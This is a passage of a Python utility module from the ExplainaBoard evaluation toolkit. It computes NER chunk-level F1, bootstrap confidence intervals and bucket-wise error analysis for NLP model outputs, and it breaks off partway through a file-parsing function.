640052f84c0cb61c12e0952fb3c435b3f926f6ab
|
[
"MIT"
] | null | null | null |
interpret_eval/tasks/src/errorAnalysis.py
|
Tahmid04/ExplainaBoard
|
640052f84c0cb61c12e0952fb3c435b3f926f6ab
|
[
"MIT"
] | null | null | null |
import numpy as np
import pickle
import codecs
import os
from collections import Counter
import re
import math
import scipy.stats as statss
import json
import random
import numpy
import codecs
from seqeval.metrics import precision_score, recall_score, f1_score
#from sklearn.metrics import f1_score
from nltk.tokenize import TweetTokenizer
from collections import OrderedDict
from random import choices
import scipy.stats
import csv
def get_chunks(seq):
"""
tags:dic{'per':1,....}
Args:
seq: [4, 4, 0, 0, ...] sequence of labels
tags: dict["O"] = 4
Returns:
list of (chunk_type, chunk_start, chunk_end)
Example:
seq = [4, 5, 0, 3]
tags = {"B-PER": 4, "I-PER": 5, "B-LOC": 3}
result = [("PER", 0, 2), ("LOC", 3, 4)]
"""
default = 'O'
# idx_to_tag = {idx: tag for tag, idx in tags.items()}
chunks = []
chunk_type, chunk_start = None, None
for i, tok in enumerate(seq):
#End of a chunk 1
if tok == default and chunk_type is not None:
# Add a chunk.
chunk = (chunk_type, chunk_start, i)
chunks.append(chunk)
chunk_type, chunk_start = None, None
# End of a chunk + start of a chunk!
elif tok != default:
tok_chunk_class, tok_chunk_type = get_chunk_type(tok)
if chunk_type is None:
chunk_type, chunk_start = tok_chunk_type, i
elif tok_chunk_type != chunk_type or tok_chunk_class == "B":
chunk = (chunk_type, chunk_start, i)
chunks.append(chunk)
chunk_type, chunk_start = tok_chunk_type, i
else:
pass
# end condition
if chunk_type is not None:
chunk = (chunk_type, chunk_start, len(seq))
chunks.append(chunk)
return chunks
def get_chunk_type(tok):
"""
Args:
tok: id of token, ex 4
idx_to_tag: dictionary {4: "B-PER", ...}
Returns:
tuple: "B", "PER"
"""
# tag_name = idx_to_tag[tok]
tag_class = tok.split('-')[0]
tag_type = tok.split('-')[-1]
return tag_class, tag_type
# def run_evaluate(self, sess, test, tags):
def evaluate(words,labels_pred, labels):
"""
labels_pred, labels, words: are sent-level list
eg: words --> [[i love shanghai],[i love u],[i do not know]]
words,pred, right: is a sequence, is label index or word index.
Evaluates performance on test set
"""
# true_tags = ['PER', 'LOC', 'ORG', 'PERSON', 'person', 'loc', 'company']
accs = []
correct_preds, total_correct, total_preds = 0., 0., 0.
for lab, lab_pred, word_sent in zip(labels, labels_pred, words):
accs += [a == b for (a, b) in zip(lab, lab_pred)]
lab_chunks = set(get_chunks(lab))
lab_pred_chunks = set(get_chunks(lab_pred))
correct_preds += len(lab_chunks & lab_pred_chunks)
total_preds += len(lab_pred_chunks)
total_correct += len(lab_chunks)
p = correct_preds / total_preds if correct_preds > 0 else 0
r = correct_preds / total_correct if correct_preds > 0 else 0
f1 = 2 * p * r / (p + r) if correct_preds > 0 else 0
acc = np.mean(accs)
return acc, f1, p, r
def evaluate_each_class(words,labels_pred, labels,class_type):
# class_type:PER or LOC or ORG
index = 0
accs = []
correct_preds, total_correct, total_preds = 0., 0., 0.
correct_preds_cla_type, total_preds_cla_type, total_correct_cla_type = 0., 0., 0.
for lab, lab_pred, word_sent in zip(labels, labels_pred, words):
lab_pre_class_type = []
lab_class_type = []
# accs += [a==b for (a, b) in zip(lab, lab_pred)]
lab_chunks = get_chunks(lab)
lab_pred_chunks = get_chunks(lab_pred)
for i in range(len(lab_pred_chunks)):
if lab_pred_chunks[i][0] == class_type:
lab_pre_class_type.append(lab_pred_chunks[i])
lab_pre_class_type_c = set(lab_pre_class_type)
for i in range(len(lab_chunks)):
if lab_chunks[i][0] == class_type:
lab_class_type.append(lab_chunks[i])
lab_class_type_c = set(lab_class_type)
lab_chunksss = set(lab_chunks)
correct_preds_cla_type += len(lab_pre_class_type_c & lab_chunksss)
total_preds_cla_type += len(lab_pre_class_type_c)
total_correct_cla_type += len(lab_class_type_c)
p = correct_preds_cla_type / total_preds_cla_type if correct_preds_cla_type > 0 else 0
r = correct_preds_cla_type / total_correct_cla_type if correct_preds_cla_type > 0 else 0
f1 = 2 * p * r / (p + r) if correct_preds_cla_type > 0 else 0
# acc = np.mean(accs)
return f1, p, r
def evaluate_chunk_level(pred_chunks,true_chunks):
# print(len(pred_chunks), len(true_chunks))
# if len(pred_chunks) != len(true_chunks):
# print("Error!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!: len(pred_chunks) != len(true_chunks)")
# exit()
correct_preds, total_correct, total_preds = 0., 0., 0.
correct_preds = len(set(true_chunks) & set(pred_chunks))
total_preds = len(pred_chunks)
total_correct = len(true_chunks)
# print("****** debug *************")
# print("correct_preds:\t", correct_preds)
# print("total_preds:\t", total_preds)
# print("total_correct:\t", total_correct)
p = correct_preds / total_preds if correct_preds > 0 else 0
r = correct_preds / total_correct if correct_preds > 0 else 0
f1 = 2 * p * r / (p + r) if correct_preds > 0 else 0
# acc = np.mean(accs)
return f1, p, r
def evaluate_each_class_listone(words,labels_pred, labels,class_type):
'''
words,labels_pred, labels is list
eg: labels = [b-per, i-per,b-org,o,o,o, ...]
:return:
'''
correct_preds, total_correct, total_preds = 0., 0., 0.
correct_preds_cla_type, total_preds_cla_type, total_correct_cla_type = 0., 0., 0.
lab_pre_class_type =[]
lab_class_type =[]
true_chunks = get_chunks(labels)
pred_chunks = get_chunks(labels_pred)
for i in range(len(pred_chunks)):
if pred_chunks[i][0] == class_type:
lab_pre_class_type.append(pred_chunks[i])
lab_pre_class_type_c = set(lab_pre_class_type)
for i in range(len(true_chunks)):
if true_chunks[i][0] == class_type:
lab_class_type.append(true_chunks[i])
lab_class_type_c = set(lab_class_type)
lab_chunksss = set(true_chunks)
correct_preds_cla_type += len(lab_pre_class_type_c & lab_chunksss)
total_preds_cla_type += len(lab_pre_class_type_c)
total_correct_cla_type += len(lab_class_type_c)
p = correct_preds_cla_type / total_preds_cla_type if correct_preds_cla_type > 0 else 0
r = correct_preds_cla_type / total_correct_cla_type if correct_preds_cla_type > 0 else 0
f1 = 2 * p * r / (p + r) if correct_preds_cla_type > 0 else 0
# acc = np.mean(accs)
return f1, p, r,len(lab_class_type)
# if __name__ == '__main__':
# max_sent = 10
# tags = {'0': 0,
# 'B-PER': 1, 'I-PER': 2,
# 'B-LOC': 3, 'I-LOC': 4,
# 'B-ORG': 5, 'I-ORG': 6,
# 'B-OTHER': 7, 'I-OTHER': 8,
# 'O': 9}
# labels_pred = [
# [9, 9, 9, 1, 3, 1, 2, 2, 0, 0],
# [9, 9, 9, 1, 3, 1, 2, 0, 0, 0]
# ]
# labels = [
# [9, 9, 9, 9, 3, 1, 2, 2, 0, 0],
# [9, 9, 9, 9, 3, 1, 2, 2, 0, 0]
# ]
# words = [
# [0, 0, 0, 0, 0, 3, 6, 8, 5, 7],
# [0, 0, 0, 4, 5, 6, 7, 9, 1, 7]
# ]
# id_to_vocb = {0: 'a', 1: 'b', 2: 'c', 3: 'd', 4: 'e', 5: 'f', 6: 'g', 7: 'h', 8: 'i', 9: 'j'}
# class_type = 'PER'
# acc, f1, p, r = evaluate(labels_pred, labels, words, tags, max_sent, id_to_vocb)
# print acc, f1, p, r
# f1, p, r = evaluate_each_class(labels_pred, labels, words, tags, max_sent, id_to_vocb, class_type)
# print f1, p, r
def format4json(sent):
sent = sent.replace(":"," ").replace("\"","").replace("\'","").replace("/","").replace("\\","").replace("{","").replace("}","")
sent = sent.replace("\"","")
return sent
def cap_feature(s):
"""
Capitalization feature:
0 = low caps
1 = all caps
2 = first letter caps
3 = one capital (not first letter)
"""
if s.lower() == s:
return "low_caps"
elif s.upper() == s:
return "full_caps"
elif s[0].upper() == s[0]:
return "first_caps"
else:
return "not_first_caps"
def dict_char2word(sentence):
ind_w = 0
dict_c2w = {}
for ind, c in enumerate(sentence):
dict_c2w[ind] = ind_w
if c ==" ":
ind_w += 1
return dict_c2w
def get_sample_rate(n_data):
res = 0.8
if n_data > 300000:
res = 0.1
elif n_data > 100000 and n_data < 300000:
res = 0.2
return res
def mean_confidence_interval(data, confidence=0.95):
a = 1.0 * np.array(data)
n = len(a)
m, se = np.mean(a), scipy.stats.sem(a)
h = se * scipy.stats.t.ppf((1 + confidence) / 2., n-1)
return m-h, m+h
def compute_confidence_interval_acc(true_label_list, pred_label_list, n_times=1000):
n_data = len(true_label_list)
sample_rate = get_sample_rate(n_data)
n_sampling = int(n_data * sample_rate)
if n_sampling == 0:
n_sampling = 1
print("n_data:\t", n_data)
print("sample_rate:\t", sample_rate)
print("n_sampling:\t", n_sampling)
performance_list = []
confidence_low, confidence_up = 0,0
for i in range(n_times):
sample_index_list = choices(range(n_data), k=n_sampling)
performance = accuracy(list(np.array(true_label_list)[sample_index_list]),
list(np.array(pred_label_list)[sample_index_list]))
performance_list.append(performance)
if n_times != 1000:
confidence_low, confidence_up = mean_confidence_interval(performance_list)
else:
performance_list.sort()
confidence_low = performance_list[24]
confidence_up = performance_list[974]
print("\n")
print("confidence_low:\t", confidence_low)
print("confidence_up:\t", confidence_up)
return confidence_low, confidence_up
# 1000
def compute_confidence_interval_f1(spans_true, spans_pred, dict_span2sid, dict_span2sid_pred, n_times=1000):
n_data = len(dict_span2sid)
sample_rate = get_sample_rate(n_data)
n_sampling = int(n_data * sample_rate)
print("sample_rate:\t", sample_rate)
print("n_sampling:\t", n_sampling)
dict_sid2span_salient = {}
for span in spans_true:
#print(span)
if len(span.split("_"))!=3:
break
sid = dict_span2sid[span]
if sid in dict_sid2span_salient.keys():
dict_sid2span_salient[sid].append(span)
else:
dict_sid2span_salient[sid] = [span]
dict_sid2span_salient_pred = {}
for span in spans_pred:
sid = dict_span2sid_pred[span]
if sid in dict_sid2span_salient_pred.keys():
dict_sid2span_salient_pred[sid].append(span)
else:
dict_sid2span_salient_pred[sid] = [span]
performance_list = []
confidence_low, confidence_up = 0,0
for i in range(n_times):
sample_index_list = choices(range(n_data), k=n_sampling)
true_label_bootstrap_list = []
pred_label_bootstrap_list = []
for ind, sid in enumerate(sample_index_list):
if sid in dict_sid2span_salient.keys():
true_label_list = dict_sid2span_salient[sid]
true_label_list_revised = [true_label + "_" + str(ind) for true_label in true_label_list]
true_label_bootstrap_list += true_label_list_revised
if sid in dict_sid2span_salient_pred.keys():
pred_label_list = dict_sid2span_salient_pred[sid]
pred_label_list_revised = [pred_label + "_" + str(ind) for pred_label in pred_label_list]
pred_label_bootstrap_list += pred_label_list_revised
f1, p, r = evaluate_chunk_level(pred_label_bootstrap_list, true_label_bootstrap_list)
performance_list.append(f1)
if n_times != 1000:
confidence_low, confidence_up = mean_confidence_interval(performance_list)
else:
performance_list.sort()
confidence_low = performance_list[24]
confidence_up = performance_list[974]
# print("\n")
# print("confidence_low:\t", confidence_low)
# print("confidence_up:\t", confidence_up)
return confidence_low, confidence_up
################ Calculate Bucket-wise F1 Score:
def getBucketF1(dict_bucket2span, dict_bucket2span_pred, dict_span2sid, dict_span2sid_pred):
print('------------------ attribute')
dict_bucket2f1 = {}
for bucket_interval, spans_true in dict_bucket2span.items():
spans_pred = []
#print('bucket_interval: ',bucket_interval)
if bucket_interval not in dict_bucket2span_pred.keys():
#print(bucket_interval)
raise ValueError("Predict Label Bucketing Errors")
else:
spans_pred = dict_bucket2span_pred[bucket_interval]
# print("debug----------")
# print(len(dict_span2sid))
# print(len(dict_span2sid_pred))
confidence_low, confidence_up = compute_confidence_interval_f1(spans_true, spans_pred, dict_span2sid, dict_span2sid_pred)
confidence_low = format(confidence_low , '.3g')
confidence_up = format(confidence_up, '.3g')
f1, p, r = evaluate_chunk_level(spans_pred, spans_true)
print("-----------print spans_pred -------------")
print(spans_pred)
print("confidence_low:\t", confidence_low)
print("confidence_up:\t", confidence_up)
print("F1:\t", f1)
print("------------------------------------------")
dict_bucket2f1[bucket_interval] = [f1, len(spans_true), confidence_low, confidence_up]
# if bucket_interval[0] == 1.0:
# print("debug-f1:",f1)
# print(spans_pred[0:20])
# print(spans_true[0:20])
# print("dict_bucket2f1: ",dict_bucket2f1)
return sortDict(dict_bucket2f1)
# dict_chunkid2spanSent: 2_3 -> New York|||This is New York city
# dict_pos2tag: 2_3 -> NER
def get_errorCase(dict_pos2tag, dict_pos2tag_pred, dict_chunkid2spanSent, dict_chunkid2spanSent_pred):
errorCase_list = []
for pos, tag in dict_pos2tag.items():
true_label = tag
pred_label = ""
#print(dict_chunkid2spanSent.keys())
if pos+"_"+tag not in dict_chunkid2spanSent.keys():
continue
span_sentence = dict_chunkid2spanSent[pos+"_"+tag]
if pos in dict_pos2tag_pred.keys():
pred_label = dict_pos2tag_pred[pos]
if true_label == pred_label:
continue
else:
pred_label = "O"
error_case = span_sentence + "|||" + true_label + "|||" + pred_label
errorCase_list.append(error_case)
for pos, tag in dict_pos2tag_pred.items():
true_label = ""
pred_label = tag
if pos+"_"+tag not in dict_chunkid2spanSent_pred.keys():
continue
span_sentence = dict_chunkid2spanSent_pred[pos+"_"+tag]
if pos in dict_pos2tag.keys():
true_label = dict_pos2tag[pos]
if true_label == pred_label:
continue
else:
true_label = "O"
error_case = span_sentence + "|||" + true_label + "|||" + pred_label
errorCase_list.append(error_case)
#print(errorCase_list)
return errorCase_list
################ Calculate Bucket-wise F1 Score:
def getBucketF1_ner(dict_bucket2span, dict_bucket2span_pred, dict_span2sid, dict_span2sid_pred, dict_chunkid2span, dict_chunkid2span_pred, is_print_ci, is_print_case):
    """Compute bucket-wise chunk-level F1 for span tasks (e.g. NER).

    Span ids are assumed to look like "start_end_tag"; the first two
    underscore fields identify the position, the last one the tag.
    Returns (sorted bucket dict, corpus-level error-case list); each bucket
    entry is [f1, #gold_spans, ci_low, ci_up, error_entity_list].
    """
    dict_bucket2f1 = {}
    # predicted: "start_end" -> predicted tag
    dict_pos2tag_pred = {}
    for k_bucket_eval, spans_pred in dict_bucket2span_pred.items():
        for span_pred in spans_pred:
            pos_pred = "_".join(span_pred.split("_")[0:2])
            tag_pred = span_pred.split("_")[-1]
            dict_pos2tag_pred[pos_pred] = tag_pred
    # gold: "start_end" -> gold tag
    dict_pos2tag = {}
    for k_bucket_eval, spans in dict_bucket2span.items():
        for span in spans:
            pos = "_".join(span.split("_")[0:2])
            tag = span.split("_")[-1]
            dict_pos2tag[pos] = tag
    # corpus-level error cases (gold vs predicted tag per position)
    errorCase_list = get_errorCase(dict_pos2tag, dict_pos2tag_pred, dict_chunkid2span, dict_chunkid2span_pred)
    for bucket_interval, spans_true in dict_bucket2span.items():
        spans_pred = []
        if bucket_interval not in dict_bucket2span_pred.keys():
            raise ValueError("Predict Label Bucketing Errors")
        else:
            spans_pred = dict_bucket2span_pred[bucket_interval]
        confidence_low, confidence_up = 0,0
        if is_print_ci:
            # bootstrap confidence interval over sentence ids
            confidence_low, confidence_up = compute_confidence_interval_f1(spans_true, spans_pred, dict_span2sid, dict_span2sid_pred)
            confidence_low = format(confidence_low , '.3g')
            confidence_up = format(confidence_up, '.3g')
        f1, p, r = evaluate_chunk_level(spans_pred, spans_true)
        error_entity_list = []
        if is_print_case:
            for span_true in spans_true:
                if span_true not in spans_pred:
                    pos_true = "_".join(span_true.split("_")[0:2])
                    tag_true = span_true.split("_")[-1]
                    if pos_true in dict_pos2tag_pred.keys():
                        tag_pred = dict_pos2tag_pred[pos_true]
                        if tag_pred != tag_true:
                            error_entity_list.append(dict_chunkid2span[span_true] + "|||" + tag_true + "|||" + dict_pos2tag_pred[pos_true])
                    else:
                        # no predicted span at this position: report as "O"
                        error_entity_list.append(dict_chunkid2span[span_true] + "|||" + tag_true + "|||" + "O")
        dict_bucket2f1[bucket_interval] = [f1, len(spans_true), confidence_low, confidence_up, error_entity_list]
    return sortDict(dict_bucket2f1), errorCase_list
def getBucketAcc(dict_bucket2span, dict_bucket2span_pred):
    """Report accuracy (with bootstrap confidence interval) per bucket."""
    print('------------------ attribute')
    bucket2result = {}
    for interval, gold_spans in dict_bucket2span.items():
        print('bucket_interval: ', interval)
        if interval not in dict_bucket2span_pred:
            raise ValueError("Predict Label Bucketing Errors")
        pred_spans = dict_bucket2span_pred[interval]
        acc = accuracy(pred_spans, gold_spans)
        ci_low, ci_up = compute_confidence_interval_acc(pred_spans, gold_spans)
        bucket2result[interval] = [acc, len(gold_spans), ci_low, ci_up]
        print("accuracy_each_bucket:\t", acc)
    return sortDict(bucket2result)
################ Calculate Bucket-wise F1 Score:
def getBucketROUGE(dict_bucket2span):
    """Average the ROUGE score encoded in each sample id ("..._score"), per bucket."""
    print('------------------ attribute')
    bucket2rouge = {}
    for interval, samples in dict_bucket2span.items():
        scores = [float(sample.split("_")[-1]) for sample in samples]
        print('bucket_interval: ', interval)
        bucket2rouge[interval] = [np.average(scores), len(samples)]
    return sortDict(bucket2rouge)
def compute_holistic_f1_re(path, delimiter = "\t"):
    """Micro-averaged F1 over a 3-column (sentence, true, pred) file.

    Fixes: the input file is now closed via a context manager, and the
    `delimiter` parameter is honored instead of a hard-coded tab (the
    default preserves the old behavior).
    """
    true_list = []
    pred_list = []
    with open(path, "r") as fin:
        for line in fin:
            # skip malformed rows that do not have exactly 3 columns
            if len(line.split(delimiter)) != 3:
                continue
            fields = line.rstrip().split(delimiter)
            true_list.append(fields[-2])
            pred_list.append(fields[-1])
    # micro-average across all relation labels
    return f1_score(true_list, pred_list, average='micro')
def compute_holistic_f1(fn_result, delimiter = " "):
    """Corpus-level F1 via the standard CoNLL `conlleval` perl script.

    Bug fix: `cmd` was only assigned when delimiter == " ", so any other
    delimiter raised NameError on the next line; the command is now always
    built (the perl script is invoked with a tab delimiter, as before).
    """
    cmd = 'perl %s -d \"\t\" < %s' % (os.path.join('.', 'conlleval'), fn_result)
    msg = '\nStandard CoNNL perl script (author: Erik Tjong Kim Sang <erikt@uia.ua.ac.be>, version: 2004-01-26):\n'
    msg += ''.join(os.popen(cmd).readlines())
    print("result: ", msg)
    # overall F1 is on the 4th line of conlleval's report, after the colon
    f1 = float(msg.split('\n')[3].split(':')[-1].strip())
    return f1
def accuracy(labels, predictions, language=None):
    """Return the percentage of positions where prediction == label.

    `language` is accepted for interface compatibility and unused.
    Robustness fix: empty `predictions` now yields 0.0 instead of raising
    ZeroDivisionError.
    """
    if not predictions:
        return 0.0
    correct = sum(int(p == l) for p, l in zip(predictions, labels))
    return float(correct) / len(predictions) * 100
def get_ci_interval(confidence_val, confidence_delta):
    """Render a confidence interval as "(val-delta, val+delta)"."""
    center = str(confidence_val)
    delta = str(confidence_delta)
    return "(" + center + "-" + delta + ", " + center + "+" + delta + ")"
def distance(text_sents, summary_sents):
    """Compute summarization attributes (density, compression, copy length,
    novelty, repetition) for one document/summary pair.

    NOTE(review): Fragments(...) joins the arguments as if they were lists
    of sentences, while the compression ratio below calls .split(" ") on the
    same arguments as if they were strings — confirm the expected type of
    text_sents / summary_sents; one of the two usages looks inconsistent.
    coverage and repetition_2 are currently left at 0 (disabled below).
    """
    density, coverage, compression, copy_len, novelty_1, novelty_2, repetition_1, repetition_2 = 0,0,0,0,0,0,0,0
    fragment = Fragments("\n".join(summary_sents), " ".join(text_sents))
    # document-length / summary-length ratio (word counts)
    compression = len(text_sents.split(" "))/len(summary_sents.split(" "))
    density = fragment.density()
    # coverage = fragment.coverage()
    # compression = fragment.compression()
    # average length of extractive fragments copied from the source (0 if none)
    copy_len = 0 if len(fragment.copy_len()) == 0 else sum(fragment.copy_len()) / len(fragment.copy_len())
    novelty_1 = novelty_oneSample(text_sents, summary_sents, 1)
    novelty_2 = novelty_oneSample(text_sents, summary_sents, 2)
    repetition_1 = repetition_oneSample(summary_sents, 1)
    # repetition_2 = repetition_oneSample(summary_sents, 2)
    print(density, coverage, compression, copy_len, novelty_1, novelty_2, repetition_1, repetition_2)
    return density, coverage, compression, copy_len, novelty_1, novelty_2, repetition_1, repetition_2
def list_minus(a, b):
    """Element-wise difference a[i] - b[i], truncated to the shorter input."""
    result = []
    for left, right in zip(a, b):
        result.append(left - right)
    return result
def get_avg(res):
    """Replace every list value in `res` by its arithmetic mean; non-list
    values pass through unchanged.

    Robustness fix: an empty list maps to 0 instead of raising
    ZeroDivisionError.
    """
    result = {}
    for key, value in res.items():
        if isinstance(value, list):
            result[key] = sum(value) / len(value) if value else 0
        else:
            result[key] = value
    return result
def wordSegment2(sent):
    """Tokenize a sentence with NLTK's TweetTokenizer and return the tokens."""
    tokenizer = TweetTokenizer()
    return tokenizer.tokenize(sent)
def wordSegment(sent):
    """Space-separate the characters of a single unspaced token of length
    >= 10 (e.g. unsegmented CJK text); otherwise return the input unchanged."""
    is_single_token = len(sent.split(" ")) == 1
    if is_single_token and len(sent) >= 10:
        return " ".join(sent)
    return sent
def intervalTransformer(inter_list):
    """Chain adjacent intervals: each multi-value interval's left edge is
    replaced by the previous interval's right edge, e.g.
    [(0,), (1, 2), (3, 4)] -> {(0,): (0,), (1, 2): (0, 2), (3, 4): (2, 4)}."""
    mapping = {}
    last = 0
    for idx, interval in enumerate(inter_list):
        if idx == 0:
            last = interval[0]
        singleton = len(interval) == 1
        mapping[interval] = interval if singleton else (last, interval[1])
        last = interval[0] if singleton else interval[1]
    return mapping
def sortDict(dict_obj, flag = "key"):
    """Return a new dict sorted by key (flag="key") or by descending value
    length (flag="value"); any other flag yields an empty dict."""
    if flag == "key":
        ordered = sorted(dict_obj.items(), key=lambda kv: kv[0])
    elif flag == "value":
        ordered = sorted(dict_obj.items(), key=lambda kv: len(kv[1]), reverse=True)
    else:
        ordered = []
    return dict(ordered)
def reverseDict(dict_a2b):
    """Invert a mapping with numeric-like values: float(value) -> [keys]."""
    dict_b2a = {}
    for key, raw in dict_a2b.items():
        dict_b2a.setdefault(float(raw), []).append(key)
    return dict_b2a
def reverseDict_discrete(dict_a2b):
    """Invert a mapping with hashable (discrete) values: value -> [keys]."""
    inverted = {}
    for key, val in dict_a2b.items():
        inverted.setdefault(val, []).append(key)
    return inverted
def findKey(dict_obj, x):
    """Return the first interval key containing x: a 1-tuple (v,) matches on
    equality, a 2-tuple (lo, hi) matches inclusively; None if no match."""
    for key in dict_obj:
        if len(key) == 1 and x == key[0]:
            return key
        if len(key) == 2 and key[0] <= x <= key[1]:
            return key
    return None
def tuple2str(triplet):
    """Join the elements of a tuple with the "|||" separator.

    Bug fix: the old implementation appended "|||" after every element and
    then called rstrip("|||"), which strips *any* trailing '|' characters —
    corrupting values that themselves end with '|'. str.join has no such
    edge case.
    """
    return "|||".join(str(v) for v in triplet)
def bucketAttribute_SpecifiedBucketValue(dict_span2attVal, n_buckets, hardcoded_bucket_values):
    """Bucket spans by attribute value into roughly `n_buckets` equal-sized
    buckets, after first splitting out each hard-coded value (e.g. exactly
    0.0 or 1.0) into a singleton bucket of its own.

    Returns a dict mapping interval tuples ((v,) or (lo, hi)) to span lists.
    """
    p_infinity = 1000000
    n_infinity = -1000000
    n_spans = len(dict_span2attVal)
    dict_attVal2span = reverseDict(dict_span2attVal)
    dict_attVal2span = sortDict(dict_attVal2span)
    dict_bucket2span = {}
    # peel off the hard-coded singleton buckets first
    for backet_value in hardcoded_bucket_values:
        if backet_value in dict_attVal2span.keys():
            dict_bucket2span[(backet_value,)] = dict_attVal2span[backet_value]
            n_spans -= len(dict_attVal2span[backet_value])
            n_buckets -= 1
    # target number of spans per remaining bucket
    avg_entity = n_spans * 1.0 / n_buckets
    n_tmp = 0
    entity_list = []
    val_list = []
    for attval, entity in dict_attVal2span.items():
        if attval in hardcoded_bucket_values:
            continue
        val_list.append(attval)
        entity_list += entity
        n_tmp += len(entity)
        # close the current bucket once it exceeds the target size
        if n_tmp > avg_entity:
            if len(val_list) >= 2:
                key_bucket = (val_list[0], val_list[-1])
                dict_bucket2span[key_bucket] = entity_list
            else:
                dict_bucket2span[(val_list[0],)] = entity_list
            entity_list = []
            n_tmp = 0
            val_list = []
    # flush the trailing partial bucket, stretching its right edge to +inf
    if n_tmp != 0:
        if n_buckets == 1:
            dict_bucket2span[(n_infinity, p_infinity)] = entity_list
        else:
            # attribute values in [0, 1] are capped at 1.0 instead of +inf
            if val_list[0] <= 1:
                p_infinity = 1.0
            if len(val_list) >= 2:
                key_bucket = (val_list[0], p_infinity)
                dict_bucket2span[key_bucket] = entity_list
            else:
                dict_bucket2span[(val_list[0], p_infinity)] = entity_list
    return dict_bucket2span
def bucketAttribute_DiscreteValue(dict_span2attVal = None, n_buckets = 100000000, n_entities = 1):
    """Bucket spans by discrete attribute value, most-frequent values first.

    Keeps at most `n_buckets` buckets and stops at the first value occurring
    fewer than `n_entities` times (values are iterated in descending
    frequency, so all following values are at least as rare).

    Cleanup: removed dead locals (n_spans, avg_entity, n_tmp, entity_list,
    val_list) that were assigned but never used.
    """
    dict_bucket2span = {}
    dict_attVal2span = reverseDict_discrete(dict_span2attVal)
    dict_attVal2span = sortDict(dict_attVal2span, flag = "value")
    n_total = 1
    for attval, entity in dict_attVal2span.items():
        if len(entity) < n_entities or n_total > n_buckets:
            break
        dict_bucket2span[(attval,)] = entity
        n_total += 1
    return dict_bucket2span
def bucketAttribute_SpecifiedBucketInterval(dict_span2attVal, intervals):
    """Bucket spans into caller-specified intervals.

    `intervals` is either a collection of (tag,) tuples for discrete string
    attributes, or of (v,) / (lo, hi) numeric tuples. Every requested
    interval appears in the result, possibly mapped to an empty list.
    """
    dict_bucket2span = {}
    n_spans = len(dict_span2attVal)
    # discrete (string-valued) attributes, e.g. entity tags
    if type(list(intervals)[0][0]) == type("string"):
        dict_attVal2span = reverseDict_discrete(dict_span2attVal)
        dict_attVal2span = sortDict(dict_attVal2span, flag = "value")
        for attval, entity in dict_attVal2span.items():
            attval_tuple = (attval,)
            if attval_tuple in intervals:
                if attval_tuple not in dict_bucket2span.keys():
                    dict_bucket2span[attval_tuple] = entity
                else:
                    dict_bucket2span[attval_tuple] += entity
        # ensure every requested interval is present, even if empty
        for val in intervals:
            if val not in dict_bucket2span.keys():
                dict_bucket2span[val] = []
    else:
        # continuous (numeric) attributes
        dict_attVal2span = reverseDict(dict_span2attVal)
        dict_attVal2span = sortDict(dict_attVal2span)
        # initialize all requested buckets as empty
        for v in intervals:
            if len(v) == 1:
                dict_bucket2span[v] = []
            else:
                dict_bucket2span[v] = []
        for attval, entity in dict_attVal2span.items():
            # values falling outside every interval are silently dropped
            res_key = findKey(dict_bucket2span, attval)
            if res_key == None:
                continue
            dict_bucket2span[res_key] += entity
    return dict_bucket2span
def printDict(dict_obj, info="dict"):
    """Pretty-print a bucket dict: one row per interval with F1 and count."""
    print("the information of #" + info + "#")
    print("Bucket_interval\tF1\tEntity-Number")
    for interval, stats in dict_obj.items():
        if len(interval) == 1:
            label = "[" + str(interval[0]) + ",]"
        else:
            label = "[" + str(interval[0]) + ", " + str(interval[1]) + "]"
        print(label + "\t" + str(stats[0]) + "\t" + str(stats[1]))
    print("")
def extValue(cont, fr, to):
    """Extract the text between the last occurrence of `fr` and the next `to`."""
    tail = cont.split(fr)[-1]
    return tail.split(to)[0]
def loadConf(path_conf):
    """Parse an aspect configuration file into
    {notation: (func_type, func_setting, is_preComputed)}.

    Blocks are separated by "# "; each block contributes the tab-prefixed
    fields "notation:", "type:", "setting:" and "is_preComputed:".
    Fix: the config file is now closed via a context manager.
    """
    with open(path_conf, "r") as fin:
        all_cont = fin.read()
    dict_aspect_func = {}
    for block in all_cont.split("# "):
        notation = extValue(block, "notation:\t", "\n").rstrip(" ")
        # blocks without a notation field are ignored
        if notation == "":
            continue
        func_type = extValue(block, "type:\t", "\n").rstrip(" ")
        func_setting = extValue(block, "setting:\t", "\n").rstrip(" ")
        is_preComputed = extValue(block, "is_preComputed:\t", "\n").rstrip(" ")
        dict_aspect_func[notation] = (func_type, func_setting, is_preComputed)
    return dict_aspect_func
def ensureDir(f):
    """Create directory `f` (including parents) if it does not exist.

    Fix: exist_ok=True removes the check-then-create race in which another
    process could create the directory between the exists() test and
    makedirs(), which previously raised FileExistsError.
    """
    os.makedirs(f, exist_ok=True)
def load_json(path):
    """Read a JSON file and return the parsed object."""
    with open(path, "r") as fp:
        return json.load(fp)
def save_json(obj_json, path):
    """Write `obj_json` to `path` as indented JSON, keeping non-ASCII chars."""
    with open(path, "w") as out:
        json.dump(obj_json, out, indent=4, ensure_ascii=False)
def getPos2SentId(test_word_sequences_sent):
    """Map each global token position to the index of its sentence."""
    dict_pos2sid = {}
    pos = 0
    for sid, sent in enumerate(test_word_sequences_sent):
        for _ in sent:
            dict_pos2sid[pos] = sid
            pos += 1
    return dict_pos2sid
def getTokenPosition(test_word_sequences_sent):
    """Map each global token position to its offset within its own sentence."""
    dict_ap2rp = {}
    pos = 0
    for sent in test_word_sequences_sent:
        for offset in range(len(sent)):
            dict_ap2rp[pos] = offset
            pos += 1
    return dict_ap2rp
def file2list(path_file):
    """Read a file into a list of lines, trailing newlines stripped.

    Fix: context manager guarantees the file is closed on all paths.
    """
    with open(path_file, "r") as fin:
        return [line.rstrip("\n") for line in fin]
def file_to_list_triple(path_file):
    """Parse a 3-column TSV into (sentences, true labels, predicted labels).

    Rows without exactly 3 tab-separated fields are skipped.
    Fixes: context-managed file handle; each line is split once.
    """
    sent_list = []
    true_label_list = []
    pred_label_list = []
    with open(path_file, "r") as fin:
        for line in fin:
            fields = line.rstrip("\n").split("\t")
            if len(fields) != 3:
                continue
            sent_list.append(fields[0])
            true_label_list.append(fields[1])
            pred_label_list.append(fields[2])
    return sent_list, true_label_list, pred_label_list
def file_to_list_tc(path_file):
    """Parse a text-classification TSV: rows must have exactly 5 columns,
    of which the first three (sentence, true label, predicted label) are kept.

    Fixes: context-managed file handle; each line is split once.
    """
    sent_list = []
    true_label_list = []
    pred_label_list = []
    with open(path_file, "r") as fin:
        for line in fin:
            fields = line.rstrip("\n").split("\t")
            if len(fields) != 5:
                continue
            sent_list.append(fields[0])
            true_label_list.append(fields[1])
